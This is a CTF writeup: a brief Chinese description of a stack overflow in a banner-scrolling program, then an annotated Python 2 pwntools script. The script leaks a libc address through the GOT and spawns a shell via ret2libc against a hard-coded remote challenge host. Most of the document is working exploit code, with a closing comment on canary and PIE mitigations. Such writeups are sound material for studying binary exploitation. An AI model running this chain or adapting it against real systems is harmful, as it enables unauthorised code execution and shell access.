简单的程序,开始运行后会有一个跑马灯滚动。
反编译看源代码发现,跑马灯滚动三轮后有个短暂停顿,可以利用停顿间隔进行栈溢出。
# Two-stage ret2libc against a 32-bit stack buffer overflow (CTF writeup script).
# Stage 1 leaks the runtime address of read() out of the GOT; stage 2 reuses the
# same overflow to call system("/bin/sh").
# NOTE(review): Python 2 syntax (`print hex(a)`, generator `.next()`); this does
# not run under Python 3 as written.
from pwn import *
import time  # imported but never used below
context.log_level='debug'  # log every byte on the wire; handy when the offsets below need re-checking
# Hard-coded remote challenge instance from the original writeup.
r = remote("220.249.52.133",51688)
#r = process("./format",shell = True) #executes the binary
# Consume the scrolling banner up to the blank line; per the writeup, the pause
# after the banner is when the program reads the overflowing input.
r.recvuntil("\n\n")
e = ELF("./format")
libc=ELF("./libc_32.so.6")  # offsets below are only valid for this exact libc build
writeplt = e.symbols['write']  # pwntools resolves an imported function to its PLT stub
writegot = e.got['write']      # unused below (only read@GOT is leaked)
readplt = e.symbols['read']    # unused below
readgot = e.got['read']        # GOT slot holding read()'s libc address at runtime
main = e.symbols['gee']        # returned into after the leak so the overflow can be triggered a second time
# Stage 1 frame, written past the saved return address (140 bytes of padding here):
#   ret -> write@plt, then return into gee, with write's args (fd=1, buf=read@GOT, len=4).
# Binary addresses (PLT, GOT, gee) are used as constants, so this assumes a non-PIE
# binary; only libc's load address is unknown and is what the leak recovers.
payload1 = "A" * 140 + p32(writeplt) + p32(main) + p32(1) + p32(readgot) + p32(4)
r.sendline(payload1 ) #feeds the exploit to the binary
a=unpack(r.recv(4)) #gets the four bytes we leaked from the GOT
print hex(a)
# libc base = leaked runtime address of read - read's offset inside the libc file.
libc_base = a - libc.symbols['read']
success('libcbase:'+hex(libc_base))
libc.address = libc_base  # rebase the libc ELF so its symbols resolve to runtime addresses
system_address = libc.symbols['system']
binsh_address = libc.search('/bin/sh').next()  # first "/bin/sh" string inside libc
# Stage 2 frame: ret -> system, "BBBB" is the (never used) return address system()
# would go back to, followed by system's single argument.
r.sendline("A"*140 + pack(system_address)+ "BBBB"+ pack(binsh_address))
r.sendline("cat flag")
r.recvuntil("}\n")  # presumably the flag ends with '}' — read until then
r.close()
# Defender's view: the whole chain hinges on an unchecked overflow of a fixed-size
# stack buffer plus fixed (non-PIE) code/GOT addresses; a stack canary would have
# aborted stage 1 before the leak, and PIE would have removed the constant addresses.